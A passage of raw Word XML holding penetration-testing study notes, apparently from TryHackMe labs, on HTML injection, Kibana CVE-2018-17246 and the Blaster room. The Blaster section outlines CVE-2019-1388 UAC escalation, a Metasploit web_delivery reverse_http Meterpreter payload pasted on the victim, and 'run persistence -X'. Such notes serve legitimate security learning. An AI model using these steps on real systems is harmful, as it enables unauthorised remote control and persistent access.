      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>script src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="/location/of/javascript_file.js"&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A48F48" w14:textId="1ECFB105" w:rsidR="00E040F1" w:rsidRPr="00E040F1" w:rsidRDefault="00E040F1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>can have events such as “on click”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C6BE0C" w14:textId="3664850F" w:rsidR="00E040F1" w:rsidRPr="00E040F1" w:rsidRDefault="00E040F1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495170E2" w14:textId="750DD6E6" w:rsidR="00E040F1" w:rsidRPr="00076319" w:rsidRDefault="00076319" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>Occurs when a website does not properly protect or remove sensitive clear text information to the end user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA24E6" w14:textId="084B51D4" w:rsidR="00076319" w:rsidRPr="00076319" w:rsidRDefault="00076319" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>usually found in the frontend source code of sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8EDD19" w14:textId="446DEC0D" w:rsidR="00076319" w:rsidRPr="00076319" w:rsidRDefault="00076319" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>inspect source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E32BBD" w14:textId="0FE05193" w:rsidR="00076319" w:rsidRPr="00076319" w:rsidRDefault="00076319" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>HTML Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA62901" w14:textId="4666A51F" w:rsidR="00076319" w:rsidRPr="007F0512" w:rsidRDefault="007F0512" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>Occurs when unfiltered user input is displayed on the page and the website fails to sanitize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD97EB6" w14:textId="21B38D2F" w:rsidR="007F0512" w:rsidRPr="007F0512" w:rsidRDefault="007F0512" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>When users control how their input is displayed, they can submit HTML/JS code and the browser will use it on the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003BF8FA" w14:textId="5DBB26EE" w:rsidR="007F0512" w:rsidRPr="007F0512" w:rsidRDefault="007F0512" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>examining user inputs source code will show how input is passed into various functions (such as JS), and is output to the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1506D" w14:textId="643588DA" w:rsidR="007F0512" w:rsidRPr="007F0512" w:rsidRDefault="007F0512" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>can indicate injection possibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D00B74" w14:textId="7AE0F6ED" w:rsidR="007F0512" w:rsidRDefault="007F0512" w:rsidP="007F0512">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA47541" w14:textId="1AE7E01D" w:rsidR="007F0512" w:rsidRDefault="00BB25DB" w:rsidP="007F0512">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ELK Stalk/Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8D6CD6" w14:textId="74C40540" w:rsidR="00BB25DB" w:rsidRDefault="007A6E65" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId233" w:history="1">
        <w:r w:rsidR="00BB25DB" w:rsidRPr="008B0B48">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/search-search.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F0A6B3A" w14:textId="2A79757D" w:rsidR="00BB25DB" w:rsidRDefault="00BB25DB" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Search API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C5B68" w14:textId="4E0B3FAD" w:rsidR="00BB25DB" w:rsidRDefault="007A6E65" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId234" w:anchor="?_g=()" w:history="1">
        <w:r w:rsidR="00BB25DB" w:rsidRPr="008B0B48">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.36.177:5601/status#?_g=()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2096BBE6" w14:textId="10DC76BE" w:rsidR="00BB25DB" w:rsidRDefault="00BB25DB" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Kibana Status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E4C8DD" w14:textId="11F4A394" w:rsidR="00BB25DB" w:rsidRDefault="007A6E65" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId235" w:history="1">
        <w:r w:rsidR="00BB25DB" w:rsidRPr="008B0B48">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/mpgn/CVE-2018-17246</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71343190" w14:textId="20CFE89F" w:rsidR="00BB25DB" w:rsidRDefault="00BB25DB" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Directory Listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C95C35" w14:textId="1CD560FD" w:rsidR="00BB25DB" w:rsidRDefault="007A6E65" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId236" w:history="1">
        <w:r w:rsidR="00BB25DB" w:rsidRPr="008B0B48">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.36.177:8000/kibana-log.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D639AB4" w14:textId="7D644D30" w:rsidR="005F2FAD" w:rsidRDefault="005F2FAD" w:rsidP="005F2FAD">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD282C5" w14:textId="0E32A40E" w:rsidR="005F2FAD" w:rsidRDefault="00ED5B33" w:rsidP="005F2FAD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>AttackerKB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CC6488" w14:textId="2594F32D" w:rsidR="00ED5B33" w:rsidRDefault="0069542F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Lay of the Land</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E41CAF4" w14:textId="424E61A0" w:rsidR="0069542F" w:rsidRDefault="0069542F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>AttackerKB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54041802" w14:textId="2AC4F874" w:rsidR="0069542F" w:rsidRDefault="0069542F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>similar to exploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617C45D1" w14:textId="5BD66F2D" w:rsidR="0069542F" w:rsidRDefault="0069542F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>search bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73ED22" w14:textId="2212F0EC" w:rsidR="0069542F" w:rsidRDefault="0069542F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>review assessments for vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB151D8" w14:textId="0C677CFD" w:rsidR="0069542F" w:rsidRDefault="0069542F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>github pulls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7932C09C" w14:textId="70319742" w:rsidR="0069542F" w:rsidRDefault="0069542F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>exploit information and history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3984B6B6" w14:textId="3CDEE1AB" w:rsidR="00EF26F3" w:rsidRDefault="00EF26F3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>AKB Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8440ED" w14:textId="79FBDBE9" w:rsidR="00EF26F3" w:rsidRDefault="007A6E65" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId237" w:history="1">
        <w:r w:rsidR="00EF26F3" w:rsidRPr="00E538A0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/p/Horshark</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31FA1AE3" w14:textId="04DF2268" w:rsidR="00EF26F3" w:rsidRDefault="00EF26F3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>similar to searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F37A14E" w14:textId="4771BD90" w:rsidR="00B82C0C" w:rsidRDefault="007A6E65" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId238" w:history="1">
        <w:r w:rsidR="00B82C0C" w:rsidRPr="00E538A0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/horshark/akb-explorer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E3BC58A" w14:textId="7B19838E" w:rsidR="00B82C0C" w:rsidRDefault="00B82C0C" w:rsidP="00B82C0C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFF8CC2" w14:textId="189A5045" w:rsidR="00B82C0C" w:rsidRDefault="00244A82" w:rsidP="00B82C0C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bolt CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73061525" w14:textId="152C8F84" w:rsidR="00244A82" w:rsidRDefault="00244A82" w:rsidP="00B82C0C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>************ /bolt/login ****************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A747F" w14:textId="7FA41927" w:rsidR="00330973" w:rsidRDefault="00330973" w:rsidP="00B82C0C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0610AAAA" w14:textId="750249F2" w:rsidR="00330973" w:rsidRDefault="00330973" w:rsidP="00B82C0C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Blaster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DBB33C" w14:textId="40B58BEB" w:rsidR="00330973" w:rsidRDefault="00330973" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2019-1388</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC59AA1" w14:textId="7B94BF89" w:rsidR="00330973" w:rsidRDefault="00330973" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation through UAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1484E3A2" w14:textId="173DBFD7" w:rsidR="00330973" w:rsidRDefault="00330973" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hhupd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F56C41" w14:textId="50EF44B7" w:rsidR="00330973" w:rsidRDefault="007A6E65" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId239" w:history="1">
        <w:r w:rsidR="00330973" w:rsidRPr="004A7DBF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01F26CF9" w14:textId="2DE3145E" w:rsidR="00330973" w:rsidRDefault="00F630F1" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows creation of SYSTEM-level command line terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B912B98" w14:textId="4F5EC280" w:rsidR="00F630F1" w:rsidRDefault="00F630F1" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01587B86" w14:textId="2ED06F49" w:rsidR="00F630F1" w:rsidRDefault="00F630F1" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49FF04" w14:textId="7281E3E3" w:rsidR="00F630F1" w:rsidRDefault="00F630F1" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1080D5" w14:textId="6FDC4CBB" w:rsidR="00F630F1" w:rsidRDefault="00F630F1" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit Target – PSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906D14C" w14:textId="36B2DFEF" w:rsidR="00F630F1" w:rsidRDefault="00F630F1" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">show targets option </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> set target PSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0745B349" w14:textId="5818746B" w:rsidR="00F630F1" w:rsidRDefault="00F630F1" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set LPORT and LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691594A9" w14:textId="7F6E0649" w:rsidR="00DC585F" w:rsidRDefault="00DC585F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF42551" w14:textId="3D37238F" w:rsidR="00DC585F" w:rsidRDefault="00DC585F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set payload windows/meterpreter/reverse_http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075BF401" w14:textId="0AC508CE" w:rsidR="00DC585F" w:rsidRDefault="00DC585F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy output and paste into exploited terminal on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EF76DD" w14:textId="205BC116" w:rsidR="00FA782C" w:rsidRDefault="00FA782C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>host http server (python3 -m http.server) with txt of exploit code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0B1CC4" w14:textId="22C56970" w:rsidR="00FA782C" w:rsidRDefault="00FA782C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>navigate to IP:PORT in browser, copy paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6AB5EC" w14:textId="4E9EF93F" w:rsidR="00FA782C" w:rsidRDefault="00FA782C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>go back to Metasploit in attacker machine and note successful connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CCC798" w14:textId="153B577F" w:rsidR="00FA782C" w:rsidRDefault="00FA782C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cmd terminal may disappear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20984FCC" w14:textId="686D2CBB" w:rsidR="004E1EB1" w:rsidRDefault="004E1EB1" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run persistence -X</w:t>
      </w:r>
    </w:p>
